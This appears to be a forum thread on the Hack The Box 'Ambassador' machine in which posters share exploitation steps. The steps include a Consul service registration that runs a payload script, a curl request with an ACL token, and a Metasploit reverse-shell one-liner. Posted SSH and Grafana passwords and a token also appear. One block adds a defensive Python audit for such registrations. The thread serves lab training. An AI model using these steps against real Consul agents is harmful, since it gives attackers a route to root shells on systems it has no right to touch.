Ambassador - HTB [Discussion]
(October 1, 2022, 11:14 PM)araaraara Wrote: how to rooooooooot

https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/multi/misc/consul_service_exec.md
check this, abusing this service
Reply
(October 1, 2022, 11:31 PM)yumi Wrote: @Truss46

Did you access it remotely? Did you get the machine shell already? I'm remotely trying to access mysql and I'm receiving the password error message, but I'm copying directly from grafana.db.

If you already got the shell on the machine and accessed it locally, please tell me, because then I'll stop trying this and try another way; in fact, I'm going to try another path now.


You get user by exploiting the Grafana file read exploit, get creds by reading the Grafana datasources, then find a base64-encoded password for the developer user to SSH with.
Reply
Why do we need to port-forward the SSH connection to our localhost in order for the exploit to work?
Reply
(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:
{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}


Put your payload in /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register


Sorry, where did you get the information about uploading configs to the server using Consul? Please give a link. :-)
Reply
(October 2, 2022, 01:14 AM)11231123 Wrote: For root create a service config file for consul like:

exp.json:
{
  "name": "pwn",
  "tags": [
    "default"
  ],
  "checks": [
    {
      "CheckId": "lol",
      "name": "lol",
      "args": [
        "/tmp/test.sh"
      ],
      "interval": "10s",
      "timeout": "1s"
    }
  ]
}


Put your payload in /tmp/test.sh

Then just register the service with your token:

curl --header "X-Consul-Token: <token>" --request PUT -T exp.json http://127.0.0.1:8500/v1/agent/service/register


Thank you for sharing, still figuring it out because this is not triggering the shell for some reason.
Reply
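Added example, not from any poster in this thread: a small Python audit of a Consul service-registration body (the JSON shape quoted in the two posts above) that flags health checks carrying `args` or the legacy `script` field, since those make the agent execute a local command on every interval. The sample body and all function names are constructed for this example.

```python
import json
from typing import Any, Dict, List

# Constructed sample: the same shape of registration body the thread uses
# (a service whose health check runs a local script every 10 seconds).
SAMPLE_REGISTRATION = json.dumps({
    "name": "pwn",
    "tags": ["default"],
    "checks": [{"CheckId": "lol", "name": "lol",
                "args": ["/tmp/test.sh"], "interval": "10s", "timeout": "1s"}],
})


def _field(obj: Dict[str, Any], key: str) -> Any:
    """Consul matches JSON field names case-insensitively ('args' == 'Args')."""
    for k, v in obj.items():
        if k.lower() == key.lower():
            return v
    return None


def find_script_checks(service_def: Dict[str, Any]) -> List[Dict[str, Any]]:
    """Return one finding per check that would make the agent run a command.

    Script checks (`args` list, or the legacy `script` string) execute with
    the agent's own privileges, which is why a registration like the one in
    the thread yields root when the agent runs as root.
    """
    checks = list(_field(service_def, "checks") or [])
    single = _field(service_def, "check")  # Consul also accepts one "check"
    if isinstance(single, dict):
        checks.append(single)
    findings = []
    for check in checks:
        command = _field(check, "args") or _field(check, "script")
        if command:
            findings.append({
                "service": _field(service_def, "name"),
                "check": _field(check, "checkid") or _field(check, "name"),
                "command": command,
                "interval": _field(check, "interval"),
            })
    return findings


def audit_registration(body: str) -> List[Dict[str, Any]]:
    """Parse a body as sent to /v1/agent/service/register and audit it."""
    return find_script_checks(json.loads(body))
```

The agent-side control is keeping `enable_script_checks` off (Consul's default) and limiting which ACL tokens may write service registrations; this audit is a second line for registrations that reach review or an API proxy anyway.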
If anyone gets a problem "Exploit completed, but no session was created" in the metasploit framework:

Try this:

1. ssh -L 8500:0.0.0.0:8500 [email protected]

password: anEnglishManInNewYork027468

2. In a separate tab:

sudo msfconsole -q -x "use multi/misc/consul_service_exec; set payload linux/x86/meterpreter/reverse_tcp;set rhosts 127.0.0.1; set lhost PUT_YOUR_TUN0_IP; set acl_token bb03b43b-1d81-d62b-24b5-39540ee469b5; set lport 8801; exploit"

3. meterpreter > getuid

meterpreter > cd root

meterpreter > cat root.txt
Reply
I managed to get admin:messageInABottle685427 but wasn't able to log into the webpage at port 3000. Where can I use this cred?
Reply